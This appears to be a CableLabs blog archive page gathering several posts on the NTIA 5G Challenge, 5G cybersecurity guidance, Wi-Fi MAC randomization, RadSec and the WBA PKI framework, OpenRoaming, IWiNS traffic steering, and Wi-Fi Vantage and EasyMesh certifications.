NTIA Announces the Full Roster of 5G Challenge Contestants
CableLabs congratulates Capgemini Engineering, Fujitsu Network Communications, Mavenir Systems Inc., Radisys Corporation and Signal System Management for being selected as contestants in the National Telecommunications and Information Administration’s Institute for Telecommunication Sciences (NTIA-ITS) 5G Challenge. The competition is hosted by CableLabs. Including Rakuten, the early bird contestant, this group of six participants highlights the diversity of vendors working to develop open and interoperable networks for 5G and beyond.
Collectively, nine subsystems will be tested from the contestants, which vary from well-established vendors in the telecom space to newer entrants in the ecosystem of emerging technologies involving the Open Radio Access Network (O-RAN). The 5G Challenge prize competition aims to accelerate the adoption of open interfaces, interoperable components and multi-vendor solutions toward the development of an open 5G ecosystem.
Cutting-Edge Lab Capabilities
Over the past few months, CableLabs’ expert technical team prepared its state-of-the-art 5G Lab by adding new lab capabilities to test contestants’ O-RAN subsystems. The capabilities include Viavi’s TeraVM and TM 500 systems for wrap-around testing on each of the O-RAN subsystems—Centralized Unit (CU), Distributed Unit (DU) and Radio Unit (RU)—and one of the industry’s first Open Distributed Unit (O-DU) testers. CableLabs and Kyrio staff are finalizing work to ensure that participants can reliably and securely test the support of industry specifications and the interoperability of the contestants’ subsystems. Multiple CU, DU and RU systems will be tested during the 5G Challenge with the goal of accelerating the development and deployment of O-RAN in the 5G ecosystem.
The test plans for each O-RAN subsystem were developed by CableLabs in conjunction with the NTIA to focus on conformance with the O-RAN Alliance and 3GPP specifications. Each system will be tested for integration, interface conformance, functionality and performance. These tests will provide information to the vendors, NTIA-ITS, the Department of Defense and the larger 5G ecosystem about the current status of the O-RAN vendor community, the benefits of interoperability, and the potential for future development of open and interoperable systems for 5G and future wireless networks.
Staff Expertise and Analysis
Contestants and the government will not only benefit from access to the state-of-the-art 5G Lab but also from access to the wireless network expertise of CableLabs and Kyrio staff. Staff will assist each contestant team to ensure complete and accurate testing. As the Host Lab, CableLabs will also provide technical analysis of each test to NTIA-ITS.
We’re looking forward to seeing all the contestants at the 5G Lab this summer and continuing CableLabs’ long-term investment in open and interoperable networks.
Tackling Security Challenges in 5G Networks
Today, 5G mobile networks are being deployed rapidly around the globe. According to GSMA Mobile Economy 2021, 5G mobile connections in North America accounted for 3 percent of all mobile connections in 2020, but that number is expected to climb to 51 percent by 2025.
On top of the accelerated deployment of public 5G networks, private 5G networks based on unlicensed spectrum and open 5G solutions supporting open interfaces and interoperability are also emerging. It’s anticipated that 5G networks—both public and private—will become predominant in the near future.
From a security perspective, 5G networks introduce both new security enhancements and new security challenges. Particularly, the move of 5G core networks to service-based and virtualized architectures will create new security challenges. How to securely deploy 5G networks to protect both subscribers and 5G network infrastructure is of top concern to both executives and practitioners using and managing 5G technologies.
Filling the Gap in 5G Security Standards
The good news is that the National Cybersecurity Center of Excellence (NCCoE), part of the National Institute of Standards and Technology (NIST), is developing 5G cybersecurity guidance to help organizations effectively mitigate 5G-related security risks. In particular, the NCCoE seeks to address the gap in current 5G cybersecurity standards development, which primarily focuses on the security of the interfaces between 5G components. These standards don’t specify the cybersecurity protections for the underlying IT components that support and operate the 5G system.
CableLabs, along with our fellow collaborators, worked with the NCCoE on developing a 5G cybersecurity practice guide and a secure 5G reference architecture to mitigate 5G cybersecurity risks. We considered both 5G standards-based security features and a secure cloud-based hosting IT infrastructure.
The guide provides recommendations related to implementing a secure cloud environment for hosting 5G core networks—for example, by leveraging server hardware root of trust to enable remote attestation of the trustworthiness of cloud computing platforms. To date, 3GPP SA3 has yet to complete its study of security impacts resulting from the virtualization of the 5G core. Therefore, the NCCoE’s guidance and recommendations for securing the 5G cloud platform will help fill the gap in current 5G security standards and help inform 3GPP’s work in this area.
Share Your 5G Expertise
Finding Solutions to Randomized Wi-Fi MAC Addresses
As Wi-Fi device and OS vendors move to implement Randomized and Changing MAC Address (RCM) to reduce or eliminate the ability to track users and their devices, related functionality costs on the Wi-Fi industry are emerging. This blog will discuss how the industry is enhancing users’ privacy while working to maintain legitimate functions that require a stable means of device identification. It will wrap up by discussing the effects of RCM on beneficial tools and industry efforts to address those impacts through innovation and new technology development.
Functionality Impacts of Wi-Fi MAC Randomization
As privacy has become an increasing priority, addressing unwanted tracking of individuals and devices has become central to enhanced privacy efforts. Device and OS vendors have started to implement RCM to negate this tracking risk for consumers. This shift was previously discussed in an earlier CableLabs blog post titled “MAC Address Randomization: How User Privacy Impacts Wi-Fi And Internet Service Providers.”
When a user’s device is on a Wi-Fi network, the Wi-Fi MAC address is used as part of the transport protocol. Anyone with a Wi-Fi sniffer can identify the specific device and associate it with the user as he or she moves about (e.g., entering and leaving an area). At that point, the malicious entity can use the Wi-Fi MAC address to track the user at future locations based on previously correlating the user’s device to the user. RCM randomizes the MAC address, disabling the correlation between the device and the user because the same MAC address isn’t repeatedly used.
RCM implementations differ based on the device and OS vendor; these range from Wi-Fi sessions, time periods and associated SSIDs (network names), to name a few. Although RCM can help reduce and even potentially eliminate the ability of a third party to track a user, the capability comes at a cost. RCM impairs legitimate functions, features and services that rely on a static, non-randomized MAC address to identify that device. Several examples of functions hindered by RCM include captive portal authorization, parental controls, allow/deny access lists and lawful intercept.
The Wi-Fi Industry’s Solutions
Because of the impairments to legitimate functions that occur based on RCM, the Wi-Fi industry is working to develop alternative methods of identifying devices without exposing the device identity and creating the risk that a user might be tracked. The first step in this process is identifying use cases in which the device identity needs to be known for legitimate purposes. Several Wi-Fi industry organizations—including Institute of Electrical and Electronics Engineers (IEEE), Internet Engineering Task Force (IETF) and Wireless Broadband Alliance (WBA)—are working on identifying and detailing these use cases.
Although each organization is working independently, each also recognizes that cooperation and information exchange are critical to addressing the issue in a timely and unified manner. CableLabs is leading the effort and actively contributing across several organizations to ensure that consumers are protected while functions important to broadband network operators continue to operate. Through the collective support of a Wi-Fi industry composed of operators, device and OS vendors, and other vendors, innovative solutions are being explored and specified to ensure that a balanced solution emerges.
Some vendors are already considering device-identification solutions that don’t require a static MAC address and allow privacy risks to be mitigated without breaking key functionalities. One promising approach, known as fingerprinting, develops a unique device signature through evaluating radio frequency and traffic characterization. Similar solutions are being investigated to identify the presence of individual devices necessary for legitimate features to operate. However, even with these solutions, some may still allow a third party to identify and correlate devices to users, enabling the devices and users to be tracked.
The industry still needs a secure method of identifying devices without hobbling features, functions and services that depend on a static Wi-Fi MAC address while protecting data privacy concerns. To get involved in defining use cases and helping to create the right solution(s), you can join one (or more) of the industry organizations that are addressing RCM.
For more information, please contact Luther Smith (email@example.com).
Bringing Wi-Fi Security to the Next Level
WBA PKI Framework Enables RadSec Connection Security
In 2020, the COVID-19 pandemic nearly eliminated travel. Today, as restrictions are lifted, we’re seeing travel levels increase—particularly locally. Soon, we should all be able to return to the world of far-reaching travel.
Whether for trips across town or journeys around the globe, Wi-Fi accessibility is a critical necessity in the 21st century. Using various Wi-Fi roaming technologies such as Passpoint®, Wireless Broadband Alliance (WBA) WRIX and OpenRoaming™, we can enjoy the Wi-Fi connected broadband experience wherever we go. And as we move about, there are many Wi-Fi networks available to us from various operators; most are secured by some level of security, whether a shared secret, captive portal or Extensible Authentication Protocol (EAP), also known as 802.1x.
Many service providers are moving to EAP for user authentication, a tactic that not only simplifies access to their own Wi-Fi network but also enables a secure roaming experience for their users. To allow users to be authenticated and gain access to roaming Wi-Fi networks, user credentials need to be routed to the home service provider. This interconnection between the roaming partner and the home service provider has typically been over IPSec tunnels. The introduction of RadSec is changing the method of interconnection. RadSec offers a full end-to-end secure path and the ability to use dynamic interconnections.
RadSec interconnection security is based on the mutual exchange of certificates between the two operators, enabling authentication of the operators and encryption of the information exchanged. To standardize these certificates, WBA members (under the leadership of CableLabs) undertook the creation of a solid RadSec PKI framework.
The WBA team led by CableLabs are proud to have completed the PKI framework and have made it available for deployment and use by all members of the WBA, marking the closure of the WBA Roaming Evolution Working Group. The PKI framework includes the PKI Certificate Policy (CP), Trust Root Certificate Authority (CA) agreement, Policy Intermediary CA (I-CA) agreement, Issuing I-CA agreement, End-Entity agreement, Operator Deployment Guidelines and End-Entity Deployment Guidelines.
The completion of the PKI framework is ready to advance and make Wi-Fi roaming simpler. There are several roaming implementations that will benefit from the PKI framework, including specific inter-operators’ roaming deployments, the WBA Wireless Roaming intermediary eXchange (WRiX) and OpenRoaming.
The WBA PKI framework is currently available to WBA members and PKI certificates by Kyrio®, a wholly owned subsidiary of CableLabs. Moving forward, the WBA Roaming Work Group will continue to manage the PKI framework and documentation including the new project, “Profiles & RCOIs Prioritization”.
IWiNS—An Informed Approach to Mobile Traffic Steering
It’s 3p.m. and you’re rushing, in between meetings, to pick up your kids from school. You start to pull out of your garage when your boss texts you to hop on a quick video call. But something doesn’t work. Your app seems stuck, showing a spinning wheel—and you really need to get going. You’re starting to get nervous. You shake your fist at the sky and shout, “The Wi-Fi!”
That’s right: You’re far enough away from your home Wi-Fi access point that you have very little connectivity available, but you’re still close enough that your phone won’t let go of that connection. It happens all the time—like the last time you were in that coffee shop, browsing the web just fine, but then you suddenly had issues joining a video call. Or when you were walking your dog around the neighborhood while playing your favorite game, and the session kept freezing and crashing.
So, what do you do when you’re paused in your driveway, eager to get on the road? You rush through your phone settings, turn off Wi-Fi, your cellular connection kicks in and now you can finally start the video call with your boss. Your intuition saved the day—this time!
The good news is that there’s likely nothing wrong with your home Wi-Fi or your phone and that you aren’t alone in this experience. In fact, CableLabs’ primary research shows that whenever mobile customers perceive a poor quality of experience, 64 percent of them feel the need to manually troubleshoot their network connectivity—and they believe the quickest and most effective solution is to turn off Wi-Fi and rely solely on the cellular network. Unfortunately, this behavior causes operators direct and indirect losses, and it prevents users from leveraging operator Wi-Fi networks that could serve them better and potentially give them a better mobile user experience.
We live in a constantly connected world in which users often have overlapping Wi-Fi, LTE and Citizens Broadband Radio Service (CBRS) coverage. Manually troubleshooting network connectivity frustrates users who don’t want to be concerned about where their data is coming from. How can operators improve the customer experience while maintaining control over how network resources are utilized?
A 2018 PWC Consumer Intelligence Series 5G Survey shows that “roughly one-third [of broadband customers surveyed] said that reliability was a ‘must-have’ for internet access” and that “performance drops were a stronger concern than any other factor, though security, speed and cost efficiency each came up as important.”
As part of our commitment to 10G, CableLabs has been working tirelessly to develop new technologies that help improve latency, security, speed and reliability for broadband customers around the globe. With the importance of reliability to the end-consumer in mind, improvements to connection reliability both in the home and in the mobile space have become one of the top objectives of the 10G platform.
In 2018, CableLabs started researching technologies to improve reliability within the mobile user experience. We analyzed several standard and proprietary solutions, and we identified gaps representing great innovation opportunities. That was the inception of the Intelligent Wireless Network Steering (IWiNS ) project, a mobile traffic steering technology created by CableLabs. IWiNS enhances the mobile user experience by adding network and application awareness to traditional mobile traffic steering without requiring any changes to the mobile device or the network infrastructure.
Previous and current mobile steering solutions are divided into two main categories: network-centric and user-centric solutions:
- Network-centric solutions such as LTE-WLAN aggregation (LWA), LTE-WLAN Radio Level Integration with IPsec Tunnel (LWIP), 5G Access Traffic Steering Switching and Splitting (ATSSS) are generally standardized by 3GPP and are centered around the cellular ecosystem. They treat a secondary external network asset (e.g., a Wi-Fi access point) as subordinated upon a cellular base station and core network. These solutions require support inside the mobile device and modifications to Wi-Fi access points.
- User-centric solutions are based on downloadable over-the-top apps that aggregate throughput across all the wireless networks that a device can connect with. Although these solutions don’t require specific support from the device operating system (or modifications to the network infrastructure), they provide little or no control for the operator to manage the configuration of the traffic steering rules.
IWiNS fills the gaps for both types of solutions by building a technology that takes advantage of an over-the-top approach and gives full control of the traffic steering configuration to operators. Operators can now optimize single-user connectivity and take advantage of a crowd-sourced approach, resulting in a more reliable, efficient and adaptive traffic steering solution. It’s like evolving from paper maps (static and unilateral information) to the wonders of online navigation, where the power of crowd-sourced information is available.
With IWiNS, operators can generate per-application policies that are optimized using real-time network performance indicators derived from all users connected to the network. Users’ experience is enhanced by freeing them from manually troubleshooting network-connectivity issues, allowing operators to take advantage of a flexible toolset to dynamically manage network resources. Mobile virtual network operators (MVNOs) can cut costs by increasing Wi-Fi offload. Mobile network operators (MNOs) can reduce the capital cost of serving dense demand areas, leveraging cheaper network infrastructure assets and turning multiple networks into one.
IWiNS is deployed by using a client-server architecture in which the client is installed on the mobile device as an over-the-top mobile app and the server is hosted anywhere that’s convenient for the operator (e.g., public cloud, on-premises cloud, private data center). IWiNS doesn’t require any modification to the mobile device operating system or to the network infrastructure. The IWiNS client can also be embedded inside the operator’s customer care app, making its deployment simpler for the operators. The server is composed of containers that handle policy management, network metrics collection and performance estimation functions—all orchestrated to ensure the scalability, efficiency and security of the deployment.
IWiNS optimizes the mobile user experience in real time and also gives operators an effective tool to shape network utilization and control their costs. With IWiNS, a new way of experiencing mobile connectivity is right around the corner.
CableLabs has created and demonstrated the IWiNS 1.0 proof of concept. More information about the IWiNS project, including a white paper, demo and executive summary, is available below.
WBA OpenRoaming™ to Enable Global Wi-Fi Roaming
On May 28, 2020, the Wireless Broadband Alliance (WBA) announced the launch of OpenRoaming. OpenRoaming is a cloud federation–based framework that will open Wi-Fi roaming to a broad community of Identity Providers (IDPs) and Access Network Providers (ANPs). OpenRoaming is a cyber-secured, seamless connection and automatic RADIUS router all rolled into one global multi-provider ecosystem. The fundamental makeup of OpenRoaming spans multiple technologies: Passpoint, DNS Discovery, RadSec and components of the Wireless Roaming Intermediary eXchange (WRIX).
OpenRoaming works by using Roaming Consortium Identifiers (RCOIs) to allow Passpoint-driven ANP selection. The RCOIs are identified by two major categories, Settlement Free and Settlement, followed by two sets of subcategories. The subcategories define roaming consortium types and service levels. The roaming consortium types span from general consortiums to industry-specific consortiums. Service levels include none, silver and gold, each defining the level of network Quality of Service (QoS) and the rate of reporting QoS information.
Current roaming platforms are based on the use of specific realms, 3GPP network identities or roaming consortiums for the selection of the Wi-Fi networks with static peer-to-peer interconnections over an IPSec tunnel for RADIUS traffic. OpenRoaming, which Figure 1 shows, established ANPs to support multiple consortiums coupled with dynamic RadSec interconnections, eliminating the need for static peer-to-peer interconnections. An additional benefit is the use of RadSec, a RADIUS client/server connection using TLS for security, which not only eliminates the need for an IPSec peer-to-peer tunnel but also encrypts the RADIUS traffic from RADIUS client to RADIUS server, which secures traffic deeper into the providers’ networks.
OpenRoaming allows the cable industry to easily establish an inter-roaming partnership across the industry while reducing the overhead of a networking setup. With the defined cable industry-specific RCOI, ANPs can be targeted as part of the cable consortium.
OpenRoaming provides users a seamless Wi-Fi connection beyond the subscriber’s home service area, reducing the need to rely on a cellular data connection. Beyond the operators that provide Wi-Fi services, OpenRoaming is a tool that can be used by Mobile Virtual Network Operators (MVNOs) to assist with Wi-Fi connectivity, enabling cellular data to offload. This would broaden the data offload from a local network to a global network.
New Release of Wi-Fi Certified Vantage™ Continues to Improve the Wi-Fi User Experience
Wi-Fi CERTIFIED Vantage™ is a certification program created within the Wi-Fi Alliance® that makes it easy to select devices that provide an enhanced Wi-Fi experience in managed Wi-Fi networks. The latest release is now available (as of September 2020). This is the culmination of over a year’s worth of collaboration within the Wi-Fi ecosystem under CableLabs’ leadership that delivers feature-rich devices to improve Wi-Fi user experience.
The primary goal of the Wi-Fi Vantage certification program is to provide a more reliable and higher-performance user experience than unmanaged best-effort Wi-Fi networks can provide. The Wi-Fi Vantage certification program designates a highly developed set of Wi-Fi technologies optimized for managed Wi-Fi networks that directly address Wi-Fi managed network operator needs.
Wi-Fi Vantage bundles pertinent Wi-Fi Alliance certifications that improve overall network performance, deliver the latest in Wi-Fi security and encryption standards, and alleviate congestion on mobile data networks. Wi-Fi Vantage delivers a more reliable and consistent connectivity experience for users when they’re establishing network access, onboarding devices, accessing services and traversing Wi-Fi networks.
Wi-Fi Vantage will continue to be available for Wi-Fi 5 generation devices, and Wi-Fi Vantage certification for Wi-Fi 6 will now include advanced features:
- Wi-Fi 6 and Wi-Fi 5
- Wi-Fi CERTIFIED WPA3™
- Wi-Fi CERTIFIED Passpoint®
- Wi-Fi CERTIFIED Enhanced Open™
- Wi-Fi CERTIFIED Agile Multiband™
- Wi-Fi CERTIFIED Optimized Connectivity™
The newest generation of Wi-Fi Vantage Release 3 includes newly developed IEEE 802.11 features and state-of-the-art Wi-Fi technology that can be used in a broader base of operator-managed environments, including public, residential and enterprise. Vantage Release 3 adds Wi-Fi 6, Wi-Fi and WPA 3, and Enhanced Open certifications that deliver higher data rates, less congestion, more user capacity and superior security.
Wi-Fi Vantage will continue to evolve incorporating the latest technologies, giving users the most enhanced Wi-Fi experience available. Each new generation of Wi-Fi Vantage devices will provide improved device performance and reduced network connection times when customers access managed Wi-Fi networks.
As Wi-Fi data usage and user applications continue to grow, those factors introduce strain on the Wi-Fi network that impacts user experience and Wi-Fi network operation. Strains such as maintaining connection, reliable service delivery and spectrum interference/management are some of the common challenges Wi-Fi operators are trying to overcome.
The collective feature set of Wi-Fi Vantage was built to address these strains. For example, the Wi-Fi Vantage features of enhanced network discovery and advanced roaming have been trialed and demonstrated to improve performance in network connection by decreasing setup times by 76 percent and reducing management frame and beacon congestion an average of 70 percent compared with the performance of non-certified Wi-Fi Vantage devices. This is just one example of how Wi-Fi Vantage devices use unique features to overcome Wi-Fi network strains on managed networks.
Wi-Fi CERTIFIED Vantage™ Benefits to Network Operators
- Streamlined product procurement decisions
- Improved network performance and resource management
- Consistent coverage across network
- Ability to influence client roaming behavior
- AP load balancing
- Latest Wi-Fi security and encryption standards
- Quality user experiences
- Data offload
Wi-Fi CERTIFIED Vantage™ Benefits to Users
- Simpler, light or no-touch access
- Secure onboarding
- Faster speeds
- Consistent, reliable coverage
- Seamless transitions from Wi-Fi to cellular
The Wi-Fi Vantage feature set definition is driven by the operator community within the Wi-Fi Alliance that consists of Wi-Fi industry experts who have a pragmatic understanding of operator needs. A dedicated task group, led by CableLabs, was created in the Wi-Fi Alliance to address and develop certifications to meet these needs. CableLabs will continue to work with the Wi-Fi ecosystem to identify common Wi-Fi operator network strains and develop collaborative solutions in the form of standards certification.
Read more about Wi-Fi Vantage, including an animation and WFA overview papers: Wi-Fi CERTIFIED Vantage Enhancing the managed Wi-Fi network experience and Wi-Fi CERTIFIED Vantage™ Technology Overview.
Wi-Fi CERTIFIED EasyMesh™ Update: Added Features for Operator-Managed Home Wi-Fi® Networks
It’s been about a year since Wi-Fi Alliance released the Wi-Fi EasyMesh™ program and started certifying devices. Since then, the industry has been hard at work creating Wi-Fi EasyMesh products and working on what comes next. CableLabs is continuing its leadership work on the updated Wi-Fi EasyMesh certification program, and now we can all see the fruits of that labor.
The updated Wi-Fi EasyMesh protocol adds a number of essential features that operators and end-users need:
- Wi-Fi EasyMesh Controller-centric collection of Wi-Fi CERTIFIED Data Elements™ diagnostic data from all connected access points (APs)
- Enhanced backhaul security with SAE
- Optimized use of available channels with coordinated channel scanning (including DFS channels)
- Network traffic separation with virtual local area networks (VLANs), such as private and guest networks
- Wi-Fi CERTIFIED Agile Multiband™ support for improved client connections
What’s the Big Deal?
Since our last blog post about Wi-Fi EasyMesh, mesh APs have become almost as well known as antibacterial soap or friendship bracelets, albeit not yet as universally deployed. Many of these products work very well, especially those that have dedicated interconnection (backhaul) radios, as Wi-Fi® remains the easiest and most cost-effective way to connect these multi-AP systems.
So, what’s the problem we’re solving with this Wi-Fi EasyMesh update? Nearly all of the products not certified for Wi-Fi EasyMesh are opaque to an operator. When problems arise, the operator has little to no information available about what’s going on behind the cable modem gateway, and the customer is left without assistance. The first version of the Wi-Fi EasyMesh protocol created the groundwork for this, whereby the Wi-Fi EasyMesh Controller (usually in the cable modem gateway) can set up and configure the other Wi-Fi EasyMesh APs. Now, the updated Wi-Fi EasyMesh protocol includes all the diagnostics information (aka, Wi-Fi Data Elements™) that an operator might need to get down to the nitty gritty and fix an issue.
Wi-Fi Data Elements, You Say…
In the blog post, “Data Elements and TR-181 – Connect to the PNM Data You Need,” my colleague Josh Redmore explained what Wi-Fi Data Elements are and exactly why operators need them:
“The ultimate iteration of [remote Wi-Fi troubleshooting] is a fully automated proactive network maintenance system, where Wi-Fi issues are resolved before they impact your customer. When Wi-Fi becomes self-healing, customers enjoy seamless access to your services.”
We can safely say that this is the Holy Grail of any operator-deployed Wi-Fi system, and the updated Wi-Fi EasyMesh protocol with Wi-Fi Data Elements support makes that possible in a standardized way.
Figure 1: Example Wi-Fi EasyMesh and Wi-Fi Data Elements Network Topology
But Wait, There’s More…
Remember all the major enhancements listed above in the Wi-Fi EasyMesh protocol update? What benefits do those bring?
- SAE support in the backhaul brings more robust authentication mechanisms, increases cryptographic strength, disallows outdated legacy protocols, and requires the use of Protected Management Frames (PMF). It adds support for Simultaneous Authentication of Equals (SAE), which is resistant to offline dictionary attacks.
- Coordinated channel scanning is a combination of two features that essentially allow the Wi-Fi EasyMesh Controller to get a complete picture of which Wi-Fi channels are overcrowded and which are free for use. It includes the ability to ask APs to scan specific channels, including DFS channels. The result is that the Wi-Fi EasyMesh network will be able to use the best channels available for each deployment—not only as first installed, but continually.
- Network traffic separation continues Wi-Fi EasyMesh’s support for multiple service set identifiers (SSIDs) per AP and even per radio. However, until now, all traffic for those SSIDs was intermingled. Now each SSID’s traffic can be separated into VLANs. This upgrade helps operators take a step in the right direction toward traffic security.
- Wi-Fi Agile Multiband™ support adds a number of features, including optional support for Fast Transition roaming with WPA2-PSK, improved guidance for clients to move to another AP in the network, tunneling of certain client-sent management frames (ANQP, WNM, Assoc) back to the Wi-Fi EasyMesh Controller, and support for association-disallowed attributes in beacons and probe responses from Wi-Fi EasyMesh Agents.
CableLabs’ Early and Continuing Involvement
Wi-Fi connectivity is key for CableLabs’ members, and CableLabs has been working closely on this Wi-Fi Alliance standard from the start. We were chosen to be the editor of the organization's test plan for both the first and second versions of the protocol, and we worked with Wi-Fi Alliance staff and vendors to develop the certification program. CableLabs continues to help lead and contribute essential technology to the Wi-Fi EasyMesh program.
Stay tuned for more press releases and blog posts to follow the progress of this new wireless technology.
RadSec, Securing RADIUS Message Exchange
With the ever-increasing use of mobile devices for data-rich activities, mobile networks have felt the burden of handling larger amounts of data. To gain relief, mobile operators have turned to offloading data onto Wi-Fi networks that are locally available—not only their own networks but Wi-Fi networks owned by their roaming partners. If the roaming partner’s Wi-Fi network is secured, then the subscriber’s credentials are exchanged between the roaming partner and the home operator, typically over the Internet. These credentials need to be secured while traversing the Internet, and the most common method is to use IPSec secure tunnels. Although IPSec secures and encrypts this critical information over the Internet, IPSec is not without issues and risks.
One issue is that the information is encrypted only from firewall to firewall, leaving the data unencrypted within both operator networks. In addition, setting up IPSec can be cumbersome because of the amount of work typically involved and the number of individuals, which can include the server administrator, network administrator, firewall administrator and security individuals. There’s also the issue of performing key exchanges and testing the connections; the entire process is repeated if either end of the connection needs to be altered, resulting in downtime.
A Solution to These Issues Is RADIUS Security (RadSec)
Although RadSec is still a draft specification within the IEEE (RadSec profile for RADIUS), it’s based on TLS RFC 6614 “Transport Layer Security (TLS) Encryption for RADIUS,” which enables the securing and encrypting of RADIUS messages between the RADIUS client and server. RadSec ensures that all RADIUS messages are secured and encrypted not only when they’re sent over the Internet but also when they’re deeper within each operator’s network, starting with the client and server. Because RadSec is based on TLS, the client and server are mutually authenticated at connection time, ensuring a trusted connection by chaining the certificates to a trusted Root Certificate. By using certificates, the revocation of certificates can be used to eliminate unauthorized connections. In addition, TLS offers encryption of the RADIUS exchange. Encrypting the exchange prevents the exposure of sensitive subscriber information at all points between client and server—within the roaming partner’s network, over the Internet and within the mobile operator’s network—making the entire path secure.
RadSec is flexible and scalable. With RadSec, the client or server IP addresses can be altered without having to reconfigure the secure tunnel settings, as is the case with IPSec. The number of peering clients and servers can also be increased as needed based on operational requirements—without requiring additional work to establish new secure tunnels. This flexibility contributes to RadSec’s scalability. With traditional secure tunnels, if additional roaming partnerships formed, firewalls need to be set up to support the new tunnels. With RadSec, at the most, firewall access control lists (ACLs) would need to be updated to allow traffic from and to the new partner; the same certificate can be used for all roaming partnership connections.
Based on the benefits of RadSec, CableLabs has led the work in Wireless Broadband Alliance (WBA) to introduce RadSec to the WBA Wireless Roaming intermediary eXchange (WRiX).
For more information about RadSec, please contact Luther Smith (firstname.lastname@example.org).
Field Trial Results Show Wi-Fi CERTIFIED Vantage™ Devices Offer Significant Improvement to Network Performance
In a high-traffic, high-volume user environments such as subways, airports, and stadiums, maintaining a reliable connection and moving consistently across access points (APs) in a Wi-Fi network has always been a challenge for users and operators. A solution to this issue is now commercially available in the form of Wi-Fi CERTIFIED Optimized ConnectivityTM and Wi‑Fi CERTIFIED Agile MultiBandTM AP and client devices. These are core certifications to the WFA Wi-Fi CERTIFIED VantageTM program. These Wi-Fi Vantage TM devices contain features that optimize management and control frame transmissions, network discovery, authentication, and network transition. A field trial was conducted to measure the performance of a Wi‑Fi network using of Wi-Fi Optimized ConnectivityTM and Wi‑Fi Agile MultiBandTM devices embedded in a highly congested urban environment centered around a busy subway station. Results show the following improvements over non-Wi-Fi Vantage devices:
Optimized Network Discovery
Without Wi-Fi Vantage, the inefficiencies of network discovery and response messages can severely disrupt existing client connections and make it difficult for clients to attach to the network. The optimized network discovery features in Wi-Fi Vantage include suppression of, and broadcast of, probe responses by the AP and also include probe request deferral and suppression by the client. Field trial results show that the number of probe responses in a Vantage network were reduced by 76% on the 2.4 GHz radios and by 72% on the 5 GHz radios. This resulted in a probe response airtime usage reduction of 67% in 2.4 GHz and 44% in 5 GHz.
Without Wi-Fi Vantage, clients can experience long reconnection setup times when moving back into a previously-joined network. With Wi-Fi Vantage, this re-connection setup time is reduced using Fast Initial Link Setup (FILS) Authentication. When FILS Authentication was tested in the Wi-Fi Vantage network, results showed that the connection setup times decreased by 76% (from 228 ms to 55 ms).
Fast Network Transition
Without Fast Network Transition (FT), clients must perform a full Extensible Authentication Protocol (EAP) when roaming, possibly interrupting the end-user experience. With Wi-Fi Vantage, once a client device decides to roam to a different AP, band, or channel, the association and connection happen quickly and seamlessly. Test results show that FT roaming improved client re-connection setup times by 84%, reducing it from 203 ms to 31 ms. In addition, Fast Network Transition can be deployed with, and will work alongside, FILS Authentication to further optimize client connections and roams.
A full-featured Wi-Fi Vantage network will benefit overall network performance and user experience, especially in high-traffic, high-volume environments. Some Vantage features may already be included in operator-managed Wi-Fi networks using vendor-specific implementation and nomenclature. Field trial results will allow operators to assess the value of a partial- or full-featured Vantage certified Wi-Fi network. CableLabs’ joint leadership with the operator community (cable and mobile operators) created the vision and roadmap for the Wi-Fi Vantage program while partnering with the Wi-Fi ecosystem and will continue these efforts for the next generation of Wi-Fi Vantage.